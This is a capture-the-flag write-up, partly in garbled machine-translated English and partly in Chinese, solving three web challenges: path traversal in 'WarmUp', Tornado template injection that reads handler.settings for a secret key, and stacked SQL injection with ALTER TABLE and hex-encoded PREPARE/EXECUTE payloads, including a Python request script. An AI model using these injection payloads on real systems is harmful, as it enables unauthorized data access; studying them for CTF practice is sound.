1.WarmUp
Thinking is very clear, the file contains, vulnerability points are secondary decoded code, simply inject a? ../../ you can use a route through, and then to include the flag, flag inside path hint.php
2.easy_tornado
Title gave this information, flag known path, render the template should be associated with the injection, hint.txt should be given filehash algorithm,
Look url, we can control the file name and file hash
Just pass a nonexistent file name will jump to the error page, where the error string is returned directly to the back, so try template injection, write 9, also returned, guess the topic should be we need to calculate the corresponding flag file the filehash, but because the key is not known, so we need to come up with the key template by injection, is entitled tornado, where conventional injection template characters such as [], () have been filtered out, so try find some global configuration tonado to read and see
So with handler.settings tornado can access some of the "Application Settings," then the web site of a number of variable information which should be in stores, so you can get direct access to the key, and then can be constructed based on this key filehash
Then get secret md5 hash click on it to see the document still useful, not just to look at the document more than google, of course, thought to be right, such as some of the guess here is stored in a secret global configuration application.
3. Note casually
Here a first submits back where significant data corresponding to the 1, and then submit 1 ', given the
Submit 1 'or' '=', return to normal:
Description inject certainly exist, but here the common keywords had lost, and is case-insensitive regular filter, so regular check system table injection method certainly does not work then, where you can try a stack injection.
得到了两张表,那么接下来肯定要查一下两张表有哪些字段,用show coloums from,就可以得到flag字段,这里使用show create table `1919810931114514`;语句也可以查到表的结构。
然后
这里有两种解法:
第一种,因为后端数据库实际上是查询的words表,可以使用alter来更改表名和表字段,让1919810931114514的表更名为words表,那么查询的words的时候实际上是对19这张表的查询,这思路真骚。
payload为:
';alter table `1919810931114514` add(id int default 1);alter table words rename xxx;alter table `1919810931114514` rename words;#
然后再查询就可以查询到flag了,这里我猜测后端语句应该是select * from words where id=1
第二种,除了这种骚操作,常规的我见过的还是这种:
#coding=utf-8 import requests #1919810931114514 part_url='http://49.4.66.242:31368/?inject=' payload="select flag from `1919810931114514`;" payload=payload.encode('hex') payload='''1';Set @x=0x'''+str(payload)+''';Prepare a from @x;execute a;%23''' print payload full_url=part_url+payload r=requests.get(url=full_url) print r.content
先编译sql语句,这里将payload进行了16进制编码,然后使用execute来进行执行,这里16进制编码的payload在编译中可以识别出来的,又学到了。